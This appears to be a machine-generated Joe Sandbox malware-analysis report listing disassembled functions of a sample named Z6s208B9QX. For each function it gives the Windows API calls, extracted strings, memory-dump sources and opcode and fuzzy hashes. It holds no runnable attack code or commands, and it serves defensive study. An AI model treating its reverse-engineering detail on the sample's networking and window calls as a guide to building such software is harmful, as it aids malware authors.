                                                                                                        • String ID: &
                                                                                                        • API String ID: 2931989736-1010288
                                                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                        Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                        Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                        • String ID: |
                                                                                                        • API String ID: 596671847-2343686810
                                                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                        Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID: '
                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                        Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _strlen.LIBCMT ref: 0040F858
                                                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_sprintf_strlen
                                                                                                        • String ID: %02X
                                                                                                        • API String ID: 1921645428-436463671
                                                                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                        Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID: Combobox
                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                        Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                        • String ID: edit
                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                        Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                        Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonsinet_addr
                                                                                                        • String ID: 255.255.255.255
                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                        Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen
                                                                                                        • String ID: <local>
                                                                                                        • API String ID: 2038078732-4266983199
                                                                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                        Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                        • String ID: EA06
                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                        Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: u,D
                                                                                                        • API String ID: 4104443479-3858472334
                                                                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                        Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend_mallocwsprintf
                                                                                                        • String ID: %d/%02d/%02d
                                                                                                        • API String ID: 1262938277-328681919
                                                                                                        • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                        • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                        Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                        • String ID: aeB
                                                                                                        • API String ID: 857135153-906807131
                                                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                        Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 529655941-2988720461
                                                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                        Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
